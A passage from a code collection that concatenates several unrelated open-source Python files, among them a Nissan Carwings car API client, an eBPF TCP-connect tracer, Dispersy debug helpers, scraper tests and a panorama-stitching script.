"resultKey":"12345678901234567890123456789012345678901234567890"
}
The status check methods return a JSON blob containing a 'responseFlag' property.
If the communications are complete, the response flag value will be the string "1";
otherwise the value will be the string "0". You just gotta poll until you get a
"1" back. Note that the official app seems to poll every 20 seconds.
Example 'no response yet' result from a status check invocation:
{
"status":200,
"responseFlag":"0"
}
When the responseFlag does come back as "1", there will also be an "operationResult"
property. If there was an error communicating with the vehicle, it seems that
this field will contain the value "ELECTRIC_WAVE_ABNORMAL". Odd.
"""
import requests
from requests import Request, Session, RequestException
import json
import logging
from datetime import date
from responses import *
import base64
from Crypto.Cipher import Blowfish
import binascii
BASE_URL = "https://gdcportalgw.its-mo.com/gworchest_160803A/gdc/"
log = logging.getLogger(__name__)
# from http://stackoverflow.com/questions/17134100/python-blowfish-encryption
def _PKCS5Padding(string):
byteNum = len(string)
packingLength = 8 - byteNum % 8
appendage = chr(packingLength) * packingLength
return string + appendage
class CarwingsError(Exception):
pass
class Session(object):
"""Maintains a connection to CARWINGS, refreshing it when needed"""
def __init__(self, username, password, region="NNA"):
self.username = username
self.password = password
self.region_code = region
self.logged_in = False
self.custom_sessionid = None
def _request_with_retry(self, endpoint, params):
ret = self._request(endpoint, params)
if ("status" in ret) and (ret["status"] >= 400):
log.error("carwings error; logging in and trying request again: %s" % ret)
# try logging in again
self.connect()
ret = self._request(endpoint, params)
return ret
def _request(self, endpoint, params):
params["initial_app_strings"] = "geORNtsZe5I4lRGjG9GZiA"
if self.custom_sessionid:
params["custom_sessionid"] = self.custom_sessionid
else:
params["custom_sessionid"] = ""
req = Request('POST', url=BASE_URL + endpoint, data=params).prepare()
log.debug("invoking carwings API: %s" % req.url)
log.debug("params: %s" % json.dumps(params, sort_keys=True, indent=3, separators=(',', ': ')))
try:
sess = requests.Session()
response = sess.send(req)
log.debug('Response HTTP Status Code: {status_code}'.format(
status_code=response.status_code))
log.debug('Response HTTP Response Body: {content}'.format(
content=response.content))
except RequestException:
log.warning('HTTP Request failed')
j = json.loads(response.content)
if "message" in j and j["message"] == "INVALID PARAMS":
log.error("carwings error %s: %s" % (j["message"], j["status"]) )
raise CarwingsError("INVALID PARAMS")
if "ErrorMessage" in j:
log.error("carwings error %s: %s" % (j["ErrorCode"], j["ErrorMessage"]) )
raise CarwingsError
return j
def connect(self):
self.custom_sessionid = None
self.logged_in = False
response = self._request("InitialApp.php", {
"RegionCode": self.region_code,
"lg": "en-US",
})
ret = CarwingsInitialAppResponse(response)
c1 = Blowfish.new(ret.baseprm, Blowfish.MODE_ECB)
packedPassword = _PKCS5Padding(self.password)
encryptedPassword = c1.encrypt(packedPassword)
encodedPassword = base64.standard_b64encode(encryptedPassword)
response = self._request("UserLoginRequest.php", {
"RegionCode": self.region_code,
"UserId": self.username,
"Password": encodedPassword,
})
ret = CarwingsLoginResponse(response)
self.custom_sessionid = ret.custom_sessionid
self.gdc_user_id = ret.gdc_user_id
log.debug("gdc_user_id: %s" % self.gdc_user_id)
self.dcm_id = ret.dcm_id
log.debug("dcm_id: %s" % self.dcm_id)
self.tz = ret.tz
log.debug("tz: %s" % self.tz)
self.language = ret.language
log.debug("language: %s" % self.language)
log.debug("vin: %s" % ret.vin)
log.debug("nickname: %s" % ret.nickname)
self.leaf = Leaf(self, ret.leafs[0])
self.logged_in = True
return ret
def get_leaf(self, index=0):
if not self.logged_in:
self.connect()
return self.leaf
class Leaf:
def __init__(self, session, params):
self.session = session
self.vin = params["vin"]
self.nickname = params["nickname"]
self.bound_time = params["bound_time"]
log.debug("created leaf %s/%s" % (self.vin, self.nickname))
def request_update(self):
response = self.session._request_with_retry("BatteryStatusCheckRequest.php", {
"RegionCode": self.session.region_code,
"lg": self.session.language,
"DCMID": self.session.dcm_id,
"VIN": self.vin,
"tz": self.session.tz,
"UserId": self.session.gdc_user_id, # this userid is the 'gdc' userid
})
return response["resultKey"]
def get_status_from_update(self, result_key):
response = self.session._request_with_retry("BatteryStatusCheckResultRequest.php", {
"RegionCode": self.session.region_code,
"lg": self.session.language,
"DCMID": self.session.dcm_id,
"VIN": self.vin,
"tz": self.session.tz,
"resultKey": result_key,
})
# responseFlag will be "1" if a response has been returned; "0" otherwise
if response["responseFlag"] == "1":
return CarwingsBatteryStatusResponse(response)
return None
def start_climate_control(self):
response = self.session._request_with_retry("ACRemoteRequest.php", {
"RegionCode": self.session.region_code,
"lg": self.session.language,
"DCMID": self.session.dcm_id,
"VIN": self.vin,
"tz": self.session.tz,
})
return response["resultKey"]
def get_start_climate_control_result(self, result_key):
response = self.session._request_with_retry("ACRemoteResult.php", {
"RegionCode": self.session.region_code,
"lg": self.session.language,
"DCMID": self.session.dcm_id,
"VIN": self.vin,
"tz": self.session.tz,
"UserId": self.session.gdc_user_id, # this userid is the 'gdc' userid
"resultKey": result_key,
})
if response["responseFlag"] == "1":
return CarwingsStartClimateControlResponse(response)
return None
def stop_climate_control(self):
response = self.session._request_with_retry("ACRemoteOffRequest.php", {
"RegionCode": self.session.region_code,
"lg": self.session.language,
"DCMID": self.session.dcm_id,
"VIN": self.vin,
"tz": self.session.tz,
})
return response["resultKey"]
def get_stop_climate_control_result(self, result_key):
response = self.session._request_with_retry("ACRemoteOffResult.php", {
"RegionCode": self.session.region_code,
"lg": self.session.language,
"DCMID": self.session.dcm_id,
"VIN": self.vin,
"tz": self.session.tz,
"UserId": self.session.gdc_user_id, # this userid is the 'gdc' userid
"resultKey": result_key,
})
if response["responseFlag"] == "1":
return CarwingsStopClimateControlResponse(response)
return None
# execute time example: "2016-02-09 17:24"
# I believe this time is specified in GMT, despite the "tz" parameter
# TODO: change parameter to python datetime object(?)
def schedule_climate_control(self, execute_time):
response = self.session._request_with_retry("ACRemoteNewRequest.php", {
"RegionCode": self.session.region_code,
"lg": self.session.language,
"DCMID": self.session.dcm_id,
"VIN": self.vin,
"tz": self.session.tz,
"ExecuteTime": execute_time,
})
return (response["status"] == 200)
# execute time example: "2016-02-09 17:24"
# I believe this time is specified in GMT, despite the "tz" parameter
# TODO: change parameter to python datetime object(?)
def update_scheduled_climate_control(self, execute_time):
response = self.session._request_with_retry("ACRemoteUpdateRequest.php", {
"RegionCode": self.session.region_code,
"lg": self.session.language,
"DCMID": self.session.dcm_id,
"VIN": self.vin,
"tz": self.session.tz,
"ExecuteTime": execute_time,
})
return (response["status"] == 200)
def cancel_scheduled_climate_control(self):
response = self.session._request_with_retry("ACRemoteCancelRequest.php", {
"RegionCode": self.session.region_code,
"lg": self.session.language,
"DCMID": self.session.dcm_id,
"VIN": self.vin,
"tz": self.session.tz,
})
return (response["status"] == 200)
def get_climate_control_schedule(self):
response = self.session._request_with_retry("GetScheduledACRemoteRequest.php", {
"RegionCode": self.session.region_code,
"lg": self.session.language,
"DCMID": self.session.dcm_id,
"VIN": self.vin,
"tz": self.session.tz,
})
if (response["status"] == 200):
if response["ExecuteTime"] != "":
return CarwingsClimateControlScheduleResponse(response)
return None
"""
{
"status":200,
}
"""
def start_charging(self):
response = self.session._request_with_retry("BatteryRemoteChargingRequest.php", {
"RegionCode": self.session.region_code,
"lg": self.session.language,
"DCMID": self.session.dcm_id,
"VIN": self.vin,
"tz": self.session.tz,
"ExecuteTime": date.today().isoformat()
})
if response["status"] == 200:
return True
return False
def get_driving_analysis(self):
response = self.session._request_with_retry("DriveAnalysisBasicScreenRequestEx.php", {
"RegionCode": self.session.region_code,
"lg": self.session.language,
"DCMID": self.session.dcm_id,
"VIN": self.vin,
"tz": self.session.tz,
})
if response["status"] == 200:
return CarwingsDrivingAnalysisResponse(response)
return None
def get_latest_battery_status(self):
response = self.session._request_with_retry("BatteryStatusRecordsRequest.php", {
"RegionCode": self.session.region_code,
"lg": self.session.language,
"DCMID": self.session.dcm_id,
"VIN": self.vin,
"tz": self.session.tz,
"TimeFrom": self.bound_time
})
if response["status"] == 200:
return CarwingsLatestBatteryStatusResponse(response)
return None
def get_latest_hvac_status(self):
response = self.session._request_with_retry("RemoteACRecordsRequest.php", {
"RegionCode": self.session.region_code,
"lg": self.session.language,
"DCMID": self.session.dcm_id,
"VIN": self.vin,
"tz": self.session.tz,
"TimeFrom": self.bound_time
})
if response["status"] == 200:
if "RemoteACRecords" in response:
return CarwingsLatestClimateControlStatusResponse(response)
else:
log.warning('no remote a/c records returned by server')
return None
# target_month format: "YYYYMM" e.g. "201602"
def get_electric_rate_simulation(self, target_month):
response = self.session._request_with_retry("PriceSimulatorDetailInfoRequest.php", {
"RegionCode": self.session.region_code,
"lg": self.session.language,
"DCMID": self.session.dcm_id,
"VIN": self.vin,
"tz": self.session.tz,
"TargetMonth": target_month
})
if response["status"] == 200:
return CarwingsElectricRateSimulationResponse(response)
return None
def request_location(self):
response = self.session._request_with_retry("MyCarFinderRequest.php", {
"RegionCode": self.session.region_code,
"lg": self.session.language,
"DCMID": self.session.dcm_id,
"VIN": self.vin,
"tz": self.session.tz,
"UserId": self.session.gdc_user_id, # this userid is the 'gdc' userid
})
return response["resultKey"]
def get_status_from_location(self, result_key):
response = self.session._request_with_retry("MyCarFinderResultRequest.php", {
"RegionCode": self.session.region_code,
"lg": self.session.language,
"DCMID": self.session.dcm_id,
"VIN": self.vin,
"tz": self.session.tz,
"resultKey": result_key,
})
if response["responseFlag"] == "1":
return CarwingsMyCarFinderResponse(response)
return None
| apache-2.0 | -7,215,533,815,677,567,000 | 29.974478 | 102 | 0.703071 | false |
zaafar/bcc | examples/tracing/tcpv4connect.py | 1 | 2519 | #!/usr/bin/python
#
# tcpv4connect Trace TCP IPv4 connect()s.
# For Linux, uses BCC, eBPF. Embedded C.
#
# USAGE: tcpv4connect [-h] [-t] [-p PID]
#
# This is provided as a basic example of TCP connection & socket tracing.
#
# All IPv4 connection attempts are traced, even if they ultimately fail.
#
# Copyright (c) 2015 Brendan Gregg.
# Licensed under the Apache License, Version 2.0 (the "License")
#
# 15-Oct-2015 Brendan Gregg Created this.
from __future__ import print_function
from bcc import BPF
# define BPF program
bpf_text = """
#include <uapi/linux/ptrace.h>
#include <net/sock.h>
#include <bcc/proto.h>
BPF_HASH(currsock, u32, struct sock *);
int kprobe__tcp_v4_connect(struct pt_regs *ctx, struct sock *sk)
{
u32 pid = bpf_get_current_pid_tgid();
// stash the sock ptr for lookup on return
currsock.update(&pid, &sk);
return 0;
};
int kretprobe__tcp_v4_connect(struct pt_regs *ctx)
{
int ret = PT_REGS_RC(ctx);
u32 pid = bpf_get_current_pid_tgid();
struct sock **skpp;
skpp = currsock.lookup(&pid);
if (skpp == 0) {
return 0; // missed entry
}
if (ret != 0) {
// failed to send SYNC packet, may not have populated
// socket __sk_common.{skc_rcv_saddr, ...}
currsock.delete(&pid);
return 0;
}
// pull in details
struct sock *skp = *skpp;
u32 saddr = 0, daddr = 0;
u16 dport = 0;
bpf_probe_read(&saddr, sizeof(saddr), &skp->__sk_common.skc_rcv_saddr);
bpf_probe_read(&daddr, sizeof(daddr), &skp->__sk_common.skc_daddr);
bpf_probe_read(&dport, sizeof(dport), &skp->__sk_common.skc_dport);
// output
bpf_trace_printk("trace_tcp4connect %x %x %d\\n", saddr, daddr, ntohs(dport));
currsock.delete(&pid);
return 0;
}
"""
# initialize BPF
b = BPF(text=bpf_text)
# header
print("%-6s %-12s %-16s %-16s %-4s" % ("PID", "COMM", "SADDR", "DADDR",
"DPORT"))
def inet_ntoa(addr):
dq = ''
for i in range(0, 4):
dq = dq + str(addr & 0xff)
if (i != 3):
dq = dq + '.'
addr = addr >> 8
return dq
# filter and format output
while 1:
# Read messages from kernel pipe
try:
(task, pid, cpu, flags, ts, msg) = b.trace_fields()
(_tag, saddr_hs, daddr_hs, dport_s) = msg.split(" ")
except ValueError:
# Ignore messages from other tracers
continue
# Ignore messages from other tracers
if _tag != "trace_tcp4connect":
continue
print("%-6d %-12.12s %-16s %-16s %-4s" % (pid, task,
inet_ntoa(int(saddr_hs, 16)),
inet_ntoa(int(daddr_hs, 16)),
dport_s))
| apache-2.0 | -5,699,068,462,233,235,000 | 22.764151 | 79 | 0.622072 | false |
gtaylor/dockerized-image-crawler | crawler/webapi_service/lib/url_parse_fsm.py | 1 | 1641 | """
Contains a really cheezy quasi-FSM for parsing URL bodies.
"""
def parse_linebreakless_url_str(url_str):
"""
Muddle through a string that contains at least one properly formed URL.
The example submission method results in the URLs running into one long,
un-delimited string.
Rather than require our example user to send linebreaks, we'll just try
to parse these as best we can.
:param str url_str: A string containing at least one valid URL.
:rtype: set
:returns: A set of URLs found within the string.
"""
split_body = url_str.split('/')
urls_to_crawl = set()
current_urlstr = ''
is_in_initial_state = True
for tok in split_body:
if not tok:
continue
if is_in_initial_state and tok not in ['http:', 'https:']:
raise ValueError("URLs must start with a protocol string.")
if tok in ['http:', 'https:']:
if current_urlstr:
# We already had a URL in the cooker, send it off.
urls_to_crawl.add(current_urlstr)
current_urlstr = tok + '//'
is_in_initial_state = False
else:
current_urlstr += tok
# If we had a URL in the buffer at the end of the loop, send it along.
if current_urlstr and _is_fully_baked_url(current_urlstr):
urls_to_crawl.add(current_urlstr)
return urls_to_crawl
def _is_fully_baked_url(url_str):
"""
:param str url_str: The URL to spot check.
:rtype: bool
:returns: True if ``url_str`` appears to be a fully-formed URL.
"""
return url_str not in ['http://', 'https://']
| bsd-3-clause | -3,473,299,123,087,814,700 | 28.303571 | 76 | 0.611213 | false |
egbertbouman/tribler-g | Tribler/Core/dispersy/debug.py | 1 | 17013 | import socket
from authentication import NoAuthentication
from bloomfilter import BloomFilter
from crypto import ec_generate_key, ec_to_public_bin, ec_to_private_bin
from destination import CommunityDestination, AddressDestination
from distribution import DirectDistribution, LastSyncDistribution, FullSyncDistribution
from dprint import dprint
from member import MyMember, Member
from member import PrivateMember, MyMember
from message import Message
from payload import MissingSequencePayload, SyncPayload, SignatureResponsePayload, CandidateRequestPayload, IdentityPayload, SimilarityPayload
from resolution import PublicResolution, LinearResolution
class DebugOnlyMembers(object):
_singleton_instances = {}
@property
def database_id(self):
return Member(self.public_key).database_id
class DebugPrivateMember(DebugOnlyMembers, PrivateMember):
pass
class DebugMyMember(DebugOnlyMembers, MyMember):
pass
class Node(object):
_socket_range = (8000, 8999)
_socket_pool = {}
_socket_counter = 0
def __init__(self):
self._socket = None
self._my_member = None
self._community = None
@property
def socket(self):
return self._socket
def init_socket(self):
assert self._socket is None
port = Node._socket_range[0] + Node._socket_counter % (Node._socket_range[1] - Node._socket_range[0])
Node._socket_counter += 1
if not port in Node._socket_pool:
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 870400)
s.setblocking(False)
s.settimeout(0.0)
while True:
try:
s.bind(("localhost", port))
except socket.error, error:
port = Node._socket_range[0] + Node._socket_counter % (Node._socket_range[1] - Node._socket_range[0])
Node._socket_counter += 1
continue
break
Node._socket_pool[port] = s
if __debug__: dprint("create socket ", port)
elif __debug__:
dprint("reuse socket ", port, level="warning")
self._socket = Node._socket_pool[port]
@property
def my_member(self):
return self._my_member
def init_my_member(self, bits=None, sync_with_database=None, candidate=True, identity=True):
assert bits is None, "The parameter bits is depricated and must be None"
assert sync_with_database is None, "The parameter sync_with_database is depricated and must be None"
ec = ec_generate_key(u"low")
self._my_member = DebugPrivateMember.get_instance(ec_to_public_bin(ec), ec_to_private_bin(ec), sync_with_database=False)
if identity:
# update identity information
assert self._socket, "Socket needs to be set to candidate"
assert self._community, "Community needs to be set to candidate"
source_address = self._socket.getsockname()
destination_address = self._community._dispersy.socket.get_address()
message = self.create_dispersy_identity_message(source_address, 2)
self.send_message(message, destination_address)
if candidate:
# update candidate information
assert self._socket, "Socket needs to be set to candidate"
assert self._community, "Community needs to be set to candidate"
source_address = self._socket.getsockname()
destination_address = self._community._dispersy.socket.get_address()
message = self.create_dispersy_candidate_request_message(source_address, destination_address, self._community.get_conversion().version, [], 1)
self.send_message(message, destination_address)
@property
def community(self):
return self._community
def set_community(self, community):
self._community = community
def encode_message(self, message):
assert isinstance(message, Message.Implementation)
tmp_member = self._community._my_member
self._community._my_member= self._my_member
try:
packet = self._community.get_conversion().encode_message(message)
finally:
self._community._my_member = tmp_member
return packet
def give_packet(self, packet, verbose=False):
assert isinstance(packet, str)
assert isinstance(verbose, bool)
if verbose: dprint("giving ", len(packet), " bytes")
self._community.dispersy.on_incoming_packets([(self.socket.getsockname(), packet)])
return packet
def give_packets(self, packets, verbose=False):
assert isinstance(packets, list)
assert isinstance(verbose, bool)
if verbose: dprint("giving ", sum(len(packet) for packet in packets), " bytes")
address = self.socket.getsockname()
self._community.dispersy.on_incoming_packets([(address, packet) for packet in packets])
return packets
def give_message(self, message, verbose=False):
assert isinstance(message, Message.Implementation)
assert isinstance(verbose, bool)
self.encode_message(message)
if verbose: dprint("giving ", message.name, " (", len(message.packet), " bytes)")
self.give_packet(message.packet, verbose=verbose)
return message
def give_messages(self, messages, verbose=False):
assert isinstance(messages, list)
assert isinstance(verbose, bool)
map(self.encode_message, messages)
if verbose: dprint("giving ", len(messages), " messages (", sum(len(message.packet) for message in messages), " bytes)")
self.give_packets([message.packet for message in messages], verbose=verbose)
return messages
def send_packet(self, packet, address, verbose=False):
assert isinstance(packet, str)
assert isinstance(address, tuple)
assert isinstance(verbose, bool)
if verbose: dprint(len(packet), " bytes to ", address[0], ":", address[1])
self._socket.sendto(packet, address)
return packet
def send_message(self, message, address, verbose=False):
assert isinstance(message, Message.Implementation)
assert isinstance(address, tuple)
assert isinstance(verbose, bool)
self.encode_message(message)
if verbose: dprint(message.name, " (", len(message.packet), " bytes) to ", address[0], ":", address[1])
self.send_packet(message.packet, address)
return message
def receive_packet(self, timeout=None, addresses=None, packets=None):
assert timeout is None, "The parameter TIMEOUT is depricated and must be None"
assert isinstance(addresses, (type(None), list))
assert isinstance(packets, (type(None), list))
while True:
try:
packet, address = self._socket.recvfrom(10240)
except:
raise
if not (addresses is None or address in addresses or (address[0] == "127.0.0.1" and ("0.0.0.0", address[1]) in addresses)):
continue
if not (packets is None or packet in packets):
continue
dprint(len(packet), " bytes from ", address[0], ":", address[1])
return address, packet
def receive_message(self, timeout=None, addresses=None, packets=None, message_names=None, payload_types=None, distributions=None, destinations=None):
assert timeout is None, "The parameter TIMEOUT is depricated and must be None"
assert isinstance(addresses, (type(None), list))
assert isinstance(packets, (type(None), list))
assert isinstance(message_names, (type(None), list))
assert isinstance(payload_types, (type(None), list))
assert isinstance(distributions, (type(None), list))
assert isinstance(destinations, (type(None), list))
while True:
address, packet = self.receive_packet(timeout, addresses, packets)
try:
message = self._community.get_conversion(packet[:22]).decode_message(address, packet)
except KeyError:
# not for this community
dprint("Ignored ", message.name, " (", len(packet), " bytes) from ", address[0], ":", address[1])
continue
if not (message_names is None or message.name in message_names):
dprint("Ignored ", message.name, " (", len(packet), " bytes) from ", address[0], ":", address[1])
continue
if not (payload_types is None or message.payload.type in payload_types):
dprint("Ignored ", message.name, " (", len(packet), " bytes) from ", address[0], ":", address[1])
continue
if not (distributions is None or isinstance(message.distribution, distributions)):
dprint("Ignored ", message.name, " (", len(packet), " bytes) from ", address[0], ":", address[1])
continue
if not (destinations is None or isinstance(message.destination, destinations)):
dprint("Ignored ", message.name, " (", len(packet), " bytes) from ", address[0], ":", address[1])
continue
dprint(message.name, " (", len(packet), " bytes) from ", address[0], ":", address[1])
return address, message
def create_dispersy_identity_message(self, address, global_time):
assert isinstance(address, tuple)
assert len(address) == 2
assert isinstance(address[0], str)
assert isinstance(address[1], int)
assert isinstance(global_time, (int, long))
meta = self._community.get_meta_message(u"dispersy-identity")
return meta.implement(meta.authentication.implement(self._my_member),
meta.distribution.implement(global_time),
meta.destination.implement(),
meta.payload.implement(address))
def create_dispersy_candidate_request_message(self, source_address, destination_address, source_default_conversion, routes, global_time):
assert isinstance(source_address, tuple)
assert len(source_address) == 2
assert isinstance(source_address[0], str)
assert isinstance(source_address[1], int)
assert isinstance(destination_address, tuple)
assert len(destination_address) == 2
assert isinstance(destination_address[0], str)
assert isinstance(destination_address[1], int)
assert isinstance(source_default_conversion, tuple)
assert len(source_default_conversion) == 2
assert isinstance(source_default_conversion[0], str)
assert len(source_default_conversion[0]) == 1
assert isinstance(source_default_conversion[1], str)
assert len(source_default_conversion[1]) == 1
assert isinstance(routes, (tuple, list))
assert not filter(lambda route: not isinstance(route, tuple), routes)
assert not filter(lambda route: not len(route) == 2, routes)
assert not filter(lambda route: not isinstance(route[0], tuple), routes)
assert not filter(lambda route: not len(route[0]) == 2, routes)
assert not filter(lambda route: not isinstance(route[0][0], str), routes)
assert not filter(lambda route: not isinstance(route[0][1], (int, long)), routes)
assert not filter(lambda route: not isinstance(route[1], float), routes)
assert isinstance(global_time, (int, long))
meta = self._community.get_meta_message(u"dispersy-candidate-request")
return meta.implement(meta.authentication.implement(self._my_member),
meta.distribution.implement(global_time),
meta.destination.implement(destination_address),
meta.payload.implement(source_address, destination_address, source_default_conversion, routes))
def create_dispersy_sync_message(self, time_low, time_high, bloom_packets, global_time):
assert isinstance(time_low, (int, long))
assert isinstance(time_high, (int, long))
assert isinstance(bloom_packets, list)
assert not filter(lambda x: not isinstance(x, str), bloom_packets)
assert isinstance(global_time, (int, long))
bloom_filter = BloomFilter(1000, 0.001, prefix="x")
map(bloom_filter.add, bloom_packets)
meta = self._community.get_meta_message(u"dispersy-sync")
return meta.implement(meta.authentication.implement(self._my_member),
meta.distribution.implement(global_time),
meta.destination.implement(),
meta.payload.implement(time_low, time_high, bloom_filter))
def create_dispersy_similarity_message(self, cluster, community, similarity, global_time):
assert isinstance(cluster, int)
assert 0 < cluster < 2^8, "CLUSTER must fit in one byte"
assert isinstance(similarity, BloomFilter)
meta = self._community.get_meta_message(u"dispersy-similarity")
return meta.implement(meta.authentication.implement(self._my_member),
meta.distribution.implement(global_time),
meta.destination.implement(),
meta.payload.implement(cluster, similarity))
def create_dispersy_missing_sequence_message(self, missing_member, missing_message_meta, missing_low, missing_high, global_time, destination_address):
assert isinstance(missing_member, Member)
assert isinstance(missing_message_meta, Message)
assert isinstance(missing_low, (int, long))
assert isinstance(missing_high, (int, long))
assert isinstance(global_time, (int, long))
assert isinstance(destination_address, tuple)
assert len(destination_address) == 2
assert isinstance(destination_address[0], str)
assert isinstance(destination_address[1], int)
meta = self._community.get_meta_message(u"dispersy-missing-sequence")
return meta.implement(meta.authentication.implement(self._my_member),
meta.distribution.implement(global_time),
meta.destination.implement(destination_address),
meta.payload.implement(missing_member, missing_message_meta, missing_low, missing_high))
def create_dispersy_signature_request_message(self, message, global_time, destination_member):
isinstance(message, Message.Implementation)
isinstance(global_time, (int, long))
isinstance(destination_member, Member)
meta = self._community.get_meta_message(u"dispersy-signature-request")
return meta.implement(meta.authentication.implement(),
meta.distribution.implement(global_time),
meta.destination.implement(destination_member),
meta.payload.implement(message))
def create_dispersy_signature_response_message(self, request_id, signature, global_time, destination_address):
assert isinstance(request_id, str)
assert len(request_id) == 20
assert isinstance(signature, str)
assert isinstance(global_time, (int, long))
assert isinstance(destination_address, tuple)
assert len(destination_address) == 2
assert isinstance(destination_address[0], str)
assert isinstance(destination_address[1], int)
meta = self._community.get_meta_message(u"dispersy-signature-response")
return meta.implement(meta.authentication.implement(),
meta.distribution.implement(global_time),
meta.destination.implement(destination_address),
meta.payload.implement(request_id, signature))
def create_dispersy_subjective_set_message(self, cluster, subjective_set, global_time):
assert isinstance(cluster, int)
assert 0 < cluster < 2^8
assert isinstance(subjective_set, BloomFilter)
assert isinstance(global_time, (int, long))
assert global_time > 0
meta = self._community.get_meta_message(u"dispersy-subjective-set")
return meta.implement(meta.authentication.implement(self._my_member),
meta.distribution.implement(global_time),
meta.destination.implement(),
meta.payload.implement(cluster, subjective_set))
| lgpl-2.1 | -4,876,651,679,844,654,000 | 48.33432 | 154 | 0.625051 | false |
shvets/GidOnline.bundle | test/gid_online_service_test.py | 1 | 4373 | # -*- coding: utf-8 -*-
import test_helper
import json
import re
import unittest
from gid_online_service import GidOnlineService
service = GidOnlineService()
#service.set_proxy("89.108.77.131:80", "http")
document = service.fetch_document(service.URL)
all_movies = service.get_movies(document)['items']
class GidOnlineServiceTest(unittest.TestCase):
def test_get_genres(self):
result = service.get_genres(document)
print(json.dumps(result, indent=4))
def test_get_top_links(self):
result = service.get_top_links(document)
print(json.dumps(result, indent=4))
def test_get_actors(self):
result = service.get_actors(document)
print(json.dumps(result, indent=4))
def test_get_actors_by_letter(self):
result = service.get_actors(document, letter='А')
print(json.dumps(result, indent=4))
def test_get_directors(self):
result = service.get_directors(document)
print(json.dumps(result, indent=4))
def test_get_directors_by_letter(self):
result = service.get_directors(document, letter='В')
print(json.dumps(result, indent=4))
def test_get_countries(self):
result = service.get_countries(document)
print(json.dumps(result, indent=4))
def test_get_years(self):
result = service.get_years(document)
print(json.dumps(result, indent=4))
def test_get_seasons(self):
result = service.get_seasons('/2016/03/strazhi-galaktiki/')
print(json.dumps(result, indent=4))
def test_get_episodes(self):
result = service.get_episodes('/2016/03/strazhi-galaktiki')
print(json.dumps(result, indent=4))
def test_parse_movies_page(self):
print(json.dumps(all_movies, indent=4))
def test_get_movies_on_genre_page(self):
document = service.fetch_document(service.URL + '/genre/vestern/')
result = service.get_movies(document, '/genre/vestern/')
print(json.dumps(result, indent=4))
def test_retrieve_movie_url(self):
# movie_url = all_movies[1]['path']
#
# print(movie_url)
movie_url = 'http://gidonline.club/2016/08/kapitan-fantastik/'
urls = service.retrieve_urls(movie_url)
print(json.dumps(urls, indent=4))
def test_retrieve_serials_url(self):
movie_url = 'http://gidonline.club/2016/03/strazhi-galaktiki/'
document = service.get_movie_document(movie_url)
serial_info = service.get_serial_info(document)
print(json.dumps(serial_info, indent=4))
def test_get_play_list(self):
#movie_url = all_movies[0]['path']
movie_url = 'http://gidonline.club/2016/05/lyubov-ne-po-razmeru/'
urls = service.retrieve_urls(movie_url)
print(json.dumps(urls, indent=4))
play_list = service.get_play_list(urls[2]['url'])
print(play_list)
def test_get_media_data(self):
movie_url = all_movies[0]['path']
document = service.fetch_document(movie_url)
data = service.get_media_data(document)
print(json.dumps(data, indent=4))
def test_get_serials_info(self):
movie_url = 'http://gidonline.club/2016/03/strazhi-galaktiki/'
document = service.get_movie_document(movie_url)
serial_info = service.get_serial_info(document)
print(json.dumps(serial_info, indent=4))
# for number, name in serial_info['seasons'].iteritems():
# print(number)
# print(name)
for number in sorted(serial_info['seasons'].keys()):
print(number)
print(serial_info['seasons'][number])
def test_re(self):
s = "http://gidonline.club/page/772/"
data = re.search('(' + service.URL + '/page/)(\d*)/', s)
print(data.group(2))
def test_search(self):
query = 'день выборов 2'
result = service.search(query)
print(json.dumps(result, indent=4))
def test_search_actors(self):
query = 'Аллен'
result = service.search_actors(document, query)
print(json.dumps(result, indent=4))
def test_search_director(self):
query = 'Люк'
result = service.search_directors(document, query)
print(json.dumps(result, indent=4))
if __name__ == '__main__':
unittest.main()
| mit | -1,188,585,378,694,636,300 | 25.216867 | 74 | 0.624311 | false |
m4tx/techswarm-receiver | tsparser/panorama.py | 1 | 4962 | import subprocess
import shutil
from PIL import Image
from tsparser.utils import StatisticDataCollector
PARAMS = {
'pto_gen': (),
'cpfind': ('--multirow',
'--celeste' # Ignore clouds
),
'cpclean': (),
'linefind': (),
'autooptimiser': ('-a', # Auto align
'-m', # Optimize photometric parameters
'-l', # Level horizon
'-s' # Select output projection and size automatically
),
'pano_modify': ('--canvas=AUTO', '--crop=AUTO'),
'nona': ('-m', 'TIFF')
}
JPEG_OPTIONS = {
'quality': 80,
}
def __call_panotool(cmd, project_url, *params, add_project_param=True):
"""
Call the specified Panorama tools command
The parameters, besides the ones passed as params argument, are taken from
PARAMS dictionary. Additionally, if add_project_param is True, then
a parameter with project URL is added at the end as well.
Function throws exception if the process returned non-zero exit code.
:param cmd: command to call
:type cmd: str
:param project_url: URL of the project
:type project_url: str
:param params: parameters to pass to the command
:type params: tuple
:param add_project_param: True if project URL should be appended to the
parameters (default behavior); False otherwise
:type add_project_param: bool
"""
params = [cmd, '-o', project_url] + list(PARAMS[cmd]) + list(params)
if add_project_param:
params += [project_url]
subprocess.check_call(params,
stderr=subprocess.STDOUT, stdout=subprocess.DEVNULL)
def __pano_to_jpeg(input_url, output_url):
"""
Open the specified file (TIFF, usually), crop it and save in given location
with options specified in JPEG_OPTIONS.
:param input_url: URL of source image
:type input_url: str
:param output_url: URL of destination file
:type output_url: str
"""
image = Image.open(input_url)
image.load()
image_box = image.getbbox()
cropped = image.crop(image_box)
cropped.save(output_url, **JPEG_OPTIONS)
def stitch_panorama(output_url, project_url, *input_urls):
"""
Stitch the panorama automatically out of the images specified in input_urls.
Basically the function just calls a bunch of commands taken mainly from
http://wiki.panotools.org/Panorama_scripting_in_a_nutshell. Parameters
to these CLI programs are taken from PARAMS dictionary, whereas options
used when saving JPEG file are stored in JPEG_OPTIONS.
:param output_url: the URL to save the file in. It should not contain
extension, since the function causes two files to be created:
`output_url + '.tif'` and `output_url + '.jpg'`.
:type output_url: str
:param project_url: the URL to store panorama project in
:type project_url: str
:param input_urls: URLs of input images
:type input_urls: str
"""
__set_progress(0, 'Creating panorama project')
__call_panotool('pto_gen', project_url, *input_urls,
add_project_param=False)
__set_progress(5, 'Searching checkpoints')
__call_panotool('cpfind', project_url)
__set_progress(35, 'Cleaning checkpoints')
__call_panotool('cpclean', project_url)
__set_progress(45, 'Finding vertical lines')
__call_panotool('linefind', project_url)
__set_progress(55, 'Optimizing')
__call_panotool('autooptimiser', project_url)
__set_progress(65, 'Cropping')
__call_panotool('pano_modify', project_url)
__set_progress(70, 'Rendering')
__call_panotool('nona', output_url + '.tif', project_url,
add_project_param=False)
# Please note that the TIFF file generated by nona is not cropped
# automatically (i.e. it has transparent space around the actual panorama)
